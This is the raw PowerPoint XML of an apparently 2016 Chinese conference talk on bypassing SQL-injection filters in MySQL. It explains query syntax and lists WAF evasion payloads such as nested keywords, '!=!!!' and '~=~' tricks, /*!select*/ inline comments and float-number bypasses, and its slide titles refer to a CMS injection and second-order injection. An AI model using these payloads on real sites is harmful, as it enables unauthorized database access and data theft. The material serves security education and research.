              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0"/>
              <a:t>DESC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>], ...]  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>[LIMIT {[offset,] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1"/>
              <a:t>row_count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1"/>
              <a:t>row_count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> OFFSET offset}]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PROCEDURE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procedure_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1"/>
              <a:t>argument_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>)]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INTO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> OUTFILE '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1"/>
              <a:t>file_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1"/>
              <a:t>export_options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0"/>
              <a:t>INTO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> DUMPFILE '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1"/>
              <a:t>file_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0"/>
              <a:t>INTO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var_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> [, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1"/>
              <a:t>var_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>]]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FOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0"/>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> | LOCK IN SHARE MODE]]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888522"/>
            <a:ext cx="8946541" cy="5359878"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000" dirty="0" smtClean="0"/>
              <a:t>MySQL  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" dirty="0" smtClean="0"/>
              <a:t>查询语句难道不就是一个模版？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="60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b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>在我看来只要前面的对应上了，后面的按照需求嵌套就行了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b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>下面我就用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>的   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>`.`user` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>演示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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7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83" y="0"/>
            <a:ext cx="11680165" cy="884377"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>第一种 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" smtClean="0"/>
              <a:t>group by xxx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804" y="1078302"/>
            <a:ext cx="11274724" cy="5693434"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>看看语法，发现里面的条件很多，后面的关键字也是很多的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Having </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作为一种条件 如果在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后跟上，是没有意义的，当然语法也是错的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Group by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的限制不是那样强，但是也已经跳过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条件了，后面可以进行联合查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/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" y="2344615"/>
            <a:ext cx="11613625" cy="44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146"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Order By xxx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23" y="1147314"/>
            <a:ext cx="11930331" cy="5710686"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这个问题最近讨论的很火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自己慢慢测试可能很难理解，但是看看语法问题就迎刃而解了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>后面 有关键字 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PROCEDURE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和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，对于这两个待会儿说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460"/>
            <a:ext cx="12068354" cy="47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81782"/>
            <a:ext cx="9404723" cy="996520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>    PROCEDURE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>INTO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62642"/>
            <a:ext cx="11895826" cy="5995358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PROCEDURE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>INTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是位于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也是最后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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>意思是在查询语句中都可以使用的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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en-US" dirty="0" smtClean="0"/>
              <a:t>是面向存储的，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里只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ANALYSE 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函数满足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sleep(),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BENCHMARK()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关键字就不多说了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> ‘’ /  into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dumpfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> ‘’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" y="2141776"/>
            <a:ext cx="9926298" cy="4621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410" y="2141776"/>
            <a:ext cx="1993781" cy="46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77638"/>
            <a:ext cx="9404723" cy="802256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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 injection  bypass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7" y="809555"/>
            <a:ext cx="12120113" cy="597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一，常见的简单列举了一些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关键字大小写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中转注入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关键字过滤时 使用包含绕过 如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>selselectect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en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>4. ! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>绕过逻辑词过滤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zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>类似 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>:select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>* from admin where id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>’!=!!!(xxx) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>为可执行函数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updatexml,if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>…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如果不是严格的匹配，如 *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可以通过，可以用 ！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>~ - + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>来绕过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如： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>* from admin where id='1' and~=~(if(1=1,1,0)); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>返回正确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.MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>下 的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/*!...*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>也是可以绕过很多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>waf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’!=!!!(xxx)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原理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数据库中，为了添加自己执行其他数据库不支持的语句，特意添加了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/*!...*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这种形式，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/**/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>后面只要添加了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>!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自动就会去执行里面的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;         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:(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> select id from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>pmw_admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> union /*!select*/ id from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>pmw_admin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2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3682" y="0"/>
            <a:ext cx="3230320" cy="829005"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>浮点数绕过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54" y="763380"/>
            <a:ext cx="12051323" cy="6028189"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>十进制浮点数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>十六进制浮点数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\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这三种绕过对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>union </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的限制是非常有用。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" y="2508738"/>
            <a:ext cx="11993685" cy="4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1566</TotalTime>
  <Words>1138</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>135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Century Gothic</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>离子</vt:lpstr>
      <vt:lpstr>  浅谈SQL注入Bypass</vt:lpstr>
      <vt:lpstr>        大概的谈谈议题内容</vt:lpstr>
      <vt:lpstr> MySQL  5.X 的查询语法如下</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>第一种 group by xxx </vt:lpstr>
      <vt:lpstr>Order By xxx</vt:lpstr>
      <vt:lpstr>    PROCEDURE 和 INTO 关键字</vt:lpstr>
      <vt:lpstr>          Sql  injection  bypass</vt:lpstr>
      <vt:lpstr>浮点数绕过</vt:lpstr>
      <vt:lpstr>基于代码分析和fuzz大法</vt:lpstr>
      <vt:lpstr>关于80sec-ids的分析</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>骑士cms最新版sql注入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注册一个商家，发布一个任务，职位管理处触发， 置顶这4个按钮，随便点击，然后确定抓包，修改</vt:lpstr>
      <vt:lpstr>传入我们构造好的语句</vt:lpstr>
      <vt:lpstr>我的账户中查看，就得到返回信息了</vt:lpstr>
      <vt:lpstr>二次注入让我们突破更多</vt:lpstr>
      <vt:lpstr>关于二次注入</vt:lpstr>
      <vt:lpstr>感谢主办方提供分享的机会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SQL注入分析Bypass</dc:title>
  <dc:creator>user</dc:creator>
  <cp:lastModifiedBy>user</cp:lastModifiedBy>
  <cp:revision>60</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-04-05T04:12:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-04-11T10:03:12Z</dcterms:modified>
</cp:coreProperties>
</file>